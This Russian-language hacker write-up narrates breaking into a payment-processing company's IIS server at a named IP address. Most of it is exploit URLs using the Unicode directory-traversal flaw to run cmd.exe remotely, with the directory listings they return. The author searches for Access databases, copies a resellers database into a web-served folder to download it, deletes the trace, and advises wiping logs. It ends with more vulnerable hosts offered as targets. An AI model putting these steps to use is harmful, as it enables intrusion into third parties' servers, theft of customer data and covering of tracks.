Как-то раз было скучно, и решил я посканить сеть. Запустил любимый SSS,
нашел по Альтависте несколько компаний, принимающих к оплате кредитные
карты (угадайте, как я это сделал =) и начал их "прорабатывать":
Paysys International Inc.
SSS радостно крикнул:
Web Servers: IIS Unicode Vulnerable
Port: 80
Description This IIS Unicode Vulnerablecan be used by an attacker to view files on your system and also possibly spawn a shell remotely.
Risk Level: High
How To Fix: Update your IIS Server.
Script http://208.5.78.41/_vti_bin /.. %c0%af../..%c0%af../..%c 0%af../winnt/system32/
cmd.exe?/c+dir+c:\
Web Servers: IDQ Real Path Attack
Port: 80
Description By sending a malformed request to the .idq ISAPI filter, it is possible for an attacker to remotely learn where your web server files are stored. I.E. http://www.example.com/invalidfilename.idq will return c:\inetpub\wwwroot\invalidfilename.idq not found.
Risk Level: Medium
How To Fix: Open up Internet Services Manager.
Right click properties for the web you want to protect.
Click the "Home Directory" tab.
Click the "Configuration" button.
Select the .idq ISAPI filter and click the "Edit" button.
Now check the box "Check that file exists."
wwwroot D:\Inetpub\new_internet\invalidfilename.idq
CVE GENERIC-MAP-NOMATCH
ну и еще кое-что.
Нас интересуют, в основном, эти два момента. Как обычно
браузер получает первую команду: http://208.5.78.41/_vti_bin
/..%c0%af../..%c 0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
в ответ:
Directory of c:\
05/31/94 06:22a 54,645 COMMAND.COM
02/22/00 06:44a <DIR> WINNT
02/22/00 06:48a <DIR> Program Files
02/22/00 06:54a 0 CONFIG.SYS
02/22/00 06:54a 0 AUTOEXEC.BAT
02/22/00 06:54a <DIR> TEMP
01/27/01 02:00p 268,435,456 pagefile.sys
02/22/00 09:00a <DIR> MSSQL7
02/22/00 10:34a 52,703 custadd.cmd
02/22/00 10:34a 19,022 custgroup.cmd
02/22/00 01:18p 578 APInstall.log
02/22/00 01:16p <DIR> Perl
05/26/00 04:25p <DIR> GHOST
07/18/00 08:41a <DIR> bentaa
08/25/00 02:08a 102 FRONTPG.LOG
09/25/00 09:41a 8 loginfo.cok
16 File(s) 268,562,514 bytes
199,917,568 bytes free
Это не интересно =(
http://208.5.78.41/_vti_bin /..%c0%af../..%c 0%af../..%c0 %af../winnt/system32/
cmd.exe?/c+dir+d:\
Directory of d:\
05/13/99 01:54p <DIR> .iFXP
02/22/00 01:15p <DIR> ActivePerl
11/04/99 12:58p <DIR> BESTOFSA
05/18/00 10:50a <DIR> CBT
10/18/00 10:31a <DIR> CBTTesting
02/22/00 02:42a <DIR> CFUSION
11/05/99 03:52p <DIR> Config
02/22/00 03:56a <DIR> Drivers
02/28/00 02:13p <DIR> DSN
02/22/00 02:41a <DIR> FrontPage2000 Extensions
02/22/00 02:41a <DIR> FrontPage98 Extensions
02/22/00 02:41a <DIR> GTEdit
08/05/99 08:44a 2,892 hacklog.cgi
02/22/00 02:41a <DIR> HEATLINKWWW
11/05/99 11:24a <DIR> IDAPI
01/31/01 06:28p <DIR> Inetpub
02/22/00 02:43a <DIR> KeySupport
08/04/99 10:21a 128 Kurt_Wayne.cgi
01/31/01 06:25p <DIR> Logfiles
03/22/00 11:20a <DIR> Logo
10/21/99 02:56p <DIR> LServer
02/16/00 08:46a 6,509,576 mdac_typ.exe
02/22/00 01:42a <DIR> NT4OptPk
10/27/00 02:32p <DIR> NTAdmin
06/20/00 01:11p <DIR> OldFTPCorp
01/27/01 02:00p 209,715,200 pagefile.sys
01/15/01 05:40p <DIR> PCB
02/22/00 01:42a <DIR> Perl
09/05/00 03:13p <DIR> private
12/20/99 03:35p <DIR> Process_Improvement
01/30/01 04:07p <DIR> Program Files
08/24/00 03:25p <DIR> REPORTS
06/30/99 04:05p <DIR> SP5
02/02/01 11:12a 464,384 test2DEFAULT.DOC
02/02/01 10:53a 331,264 testDEFAULT.DOC
02/07/00 01:40p <DIR> TESTPCB
09/26/00 04:02p <DIR> Verisign
08/25/99 03:14p <DIR> WebAdmin
02/21/00 08:57p <DIR> WebBackup
06/12/00 05:39p <DIR> Webtrends
10/19/00 08:09p <DIR> Winzip
41 File(s) 217,023,444 bytes
4,061,462,528 bytes free
И так далее
http://208.5.78.41/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+e:\
Directory of e:\
05/31/94 06:22a 54,645 COMMAND.COM
04/29/99 12:40p 22 CONFIG.SYS
04/29/99 12:40p 53 AUTOEXEC.BAT
03/18/99 06:20p 512 bootsect.dos
03/18/99 06:23p <DIR> Program Files
03/18/99 06:28p <DIR> TEMP
03/18/99 05:50p <DIR> Multimedia Files
03/19/99 04:11p <DIR> NT4OptPk
03/19/99 05:20p <DIR> certcfg
09/14/99 08:00a 151 WSREG32.LOG
03/22/99 05:34p <DIR> FrontPage98 Extensions
03/29/99 12:21p <DIR> MSFTPSVC1
04/01/99 01:14p 335,054 untitled.bmp
04/09/99 11:40a 32,753 webidfixed1135.txt
04/09/99 11:40a 32,753 Copy of webidfixed1135.txt
04/09/99 12:07p 46,032 webidfixed1201.prn
04/09/99 12:35p 41,239 loaduser.bat
04/22/99 04:12p 910 dmilog.log
04/22/99 05:04p 26,553 SMInstall.LOG
04/22/99 05:04p 127,838 SMInstallHistory.LOG
03/18/99 06:08p 0 AUTOEXEC.000
03/18/99 06:08p 0 CONFIG.000
04/29/99 11:35a 53 AUTOEXEC.001
04/29/99 11:35a 22 CONFIG.001
05/03/99 05:38p 5,979 testheatweb1.txt
05/06/99 09:23a <DIR> BENTAA
05/07/99 11:50a <DIR> Charts
05/14/99 10:58a 91 WS_FTP.LOG
05/14/99 12:24p 762 NewKeyRq.txt
05/14/99 12:36p <DIR> CertAdm
08/02/99 10:46a 558 APInstall.log
08/02/99 10:44a <DIR> Perl
09/10/99 10:15a <DIR> CFUSION
01/12/00 05:37p <DIR> FrontPage2000 Extensions
02/21/00 01:47a <DIR> KeySupport
02/21/00 04:38p 29,513 metabase.txt
01/27/01 02:00p 209,715,200 pagefile.sys
03/22/00 11:12a <DIR> Log Backups
10/18/00 10:46a <DIR> ACRODATA
10/24/00 12:44p <DIR> Webfiles
40 File(s) 210,450,693 bytes
307,527,680 bytes free
Нас интересуют файлы M$ Access, а они имеют расширение
*.mdb, но искать по всем каталогам напряжно, поэтому пусть жертва сама нам
скажет, где и что надо брать:
http://208.5.78.41/_vti_bin/..% c0%af../..%c0%af../..%c0%af../ winnt/system32/cmd.exe?
/c+dir+/s+d:\*.mdb
http://208.5.78.41/_vti_bin/..% c0%af../..%c0%af../..%c0%af../ winnt/system32/cmd.exe?
/c+dir+/s+c:\*.mdb
http://208.5.78.41/_vti_bin/..% c0%af../..%c0%af../..%c0%af../ winnt/system32/cmd.exe?
/c+dir+/s+e:\*.mdb
Ну а дальше выбираешь, что хочешь.
Далее нужно найти каталог, из которого все можно было бы скачать.
Обратимся к логу от SSS: Web Servers: IDQ Real Path Attack - это то,
что надо. Делаем так:
http://208.5.78.41/_vti_bin/gsdfg.idq
получаем
The IDQ file C:\Program Files\Common Files\ Microsoft Shared\Web Server
Extensions \40\isapi\gsdfg.ida could not be found. Значит в папке C:\Program Files\Common
Files\Microsoft Shared\Web Server Extensions\40\isapi\ разрешено исполнение программ, и, возможно,
запись. Копируем туда все, что хотим унести приблизительно так:
http://208.5.78.41/_vti_bin/..%c 0%af../..%c0%af../..%c 0%af../winnt/system32/
cmd.exe?/c+copy+e:\чего_хотим _поиметь.mdb+C:\Progra~1\Common~1\Micros~1\WebSer~1\40\isapi\*.*
В ответ что-то типа:
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi\resellers.mdb
1 file(s) copied.
Ну и осталось только своим любимым ReGet (Gozilla, NetVampire - нужное
подчеркнуть) скормить ссылку:
http://208.5.78.41/_vti_bin/resellers.mdb и радостно наблюдать за
бегущими проЦентами.
P.S. После себя не забудьте убрать:
http://208.5.78.41/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+C:\Progra~1\Common~1\Micros~1\WebSer~1\40\isapi\*.mdb
и почистить логи.
P.S.S.
Еще несколько приятных мест:
http://205.229.230.71 тот же глюк - более 50 хостящихся фирм
на сладкое:
http://209.35.170.56/_vti_bin/..%c 0%af../..%c0%af../..%c0 %af../winnt/system32/c
md.exe?/c+dir+d:\
Directory of d:\
01/18/01 02:14p <DIR> 10.0.9.15
....
